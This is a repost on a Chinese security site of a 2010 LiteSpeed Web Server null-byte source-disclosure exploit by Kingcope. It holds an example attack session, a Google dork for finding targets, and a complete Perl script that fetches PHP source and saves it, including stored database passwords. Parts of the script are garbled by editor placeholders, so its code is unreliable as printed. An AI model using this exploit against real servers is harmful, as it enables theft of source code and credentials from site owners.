首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Litespeed Technologies Web Server Remote Poison null byte Exploit
来源:vfocus.net 作者:Kingcope 发布时间:2010-06-13   
Litespeed Technologies Web Server Remote Poison null byte Zero-Day
discovered and exploited by Kingcope in June 2010
google gives me over 9million hits

Example exploit session:

%nc 192.168.2.19 80
HEAD / HTTP/1.0

HTTP/1.0 200 OK
Date: Sun, 13 Jun 2010 00:10:38 GMT
Server: LiteSpeed <-- consider it 0wned
Accept-Ranges: bytes
Connection: close
ETag: "6ff-4c12e288-a3ee"
Last-Modified: Sat, 12 Jun 2010 01:27:36 GMT
Content-Type: text/html
Content-Length: 1791

%fetch http://192.168.2.19/config.php
config.php 0 B 0 Bps
%cat config.php
%/usr/local/bin/perl Litespeed.pl 192.168.2.19 config.php
LiteSpeed Technologies Web Server Remote Source Code Disclosure Exploit
By Kingcope
June 2010

Saving source code of config.php into 192.168.2.19-config.php
Completed.
Operation Completed :>.
%cat 192.168.2.19-config.php
<?php
$db_secret="TOP SECRET PASSWORD";
?>
%

Exploit:

#!/usr/bin/perl
#
#LiteSpeed Technologies Web Server Remote Source Code Disclosure zero-day Exploit
#By Kingcope
#Google search: ""Proudly Served by LiteSpeed Web Server""
#June 2010
#Thanks to TheDefaced for the idea, http://www.milw0rm.com/exploits/4556
#

use IO::Socket;
use strict;

sub getphpsrc {
my $host = shift;
my $file = shift;

if (substr($file, 0, 1) eq "/") {
$file = substr($file, 1);
}
my $file2 = $file;
$file2 =~ s/\//_/g;
print "Saving source code of $file into $host-$file2\n";

my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => '80',
Proto => 'tcp') || die("Could not connect
to $ARGV[0]");

print $sock "GET /$file\x00.txt HTTP/1.1\r\nHost: $ARGV[0]\r\nConnection:
close\r\n\r\n";

my $buf = "";

my $lpfound = 0;
my $saveme = 0;
my $savveme = 0;
while(<$sock>) {
if (
___FCKpd___0

 =~ /LiteSpeed/) {
$lpfound = 1;
}

if ($saveme == 2) {
$savveme = 1;
}

if ($saveme != 0 && $savveme == 0) {
$saveme++;
}

if (
___FCKpd___0

 =~ /Content-Length:/) {
$saveme = 1;
}

if ($savveme == 1) {
$buf .= 
___FCKpd___0

;
}
}

if ($lpfound == 0) {
print "This does not seem to be a LiteSpeed Webserver, saving file anyways.\n";
}

open FILE, ">$host-$file2";
print FILE $buf;
close FILE;
print "Completed.\n";
}

print "LiteSpeed Technologies Web Server Remote Source Code Disclosure Exploit\n";
print "By Kingcope\n";
print "June 2010\n\n";

if ($#ARGV != 1) {
print "Usage: perl litespeed.pl <domain/ip> <php file>\n";
print "Example: perl litespeed.pl www.thedomain.com index.php\n";
exit(0);
}

getphpsrc($ARGV[0], $ARGV[1]);

print "Operation Completed :>.\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Collabtive v0.6.3 Multiple Vul
·CP3 Studio PC Ver. Dos
·Unreal IRCD 3.2.8.1 Remote Dow
·Media Player Classic V1.3.1774
·QuickOffice v3.1.0 for iPhone/
·Solarwinds 10.4.0.13 DOS
·Impact PDF Reader v2.0 for iPh
·DaLogin 2.2 (FCKeditor) Remote
·Solaris/x86 - Sync() & reboot(
·Sygate Personal Firewall 5.6 b
·File Sharing Wizard v1.5.0 Buf
·Allwin MessageBoxA Shellcode
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved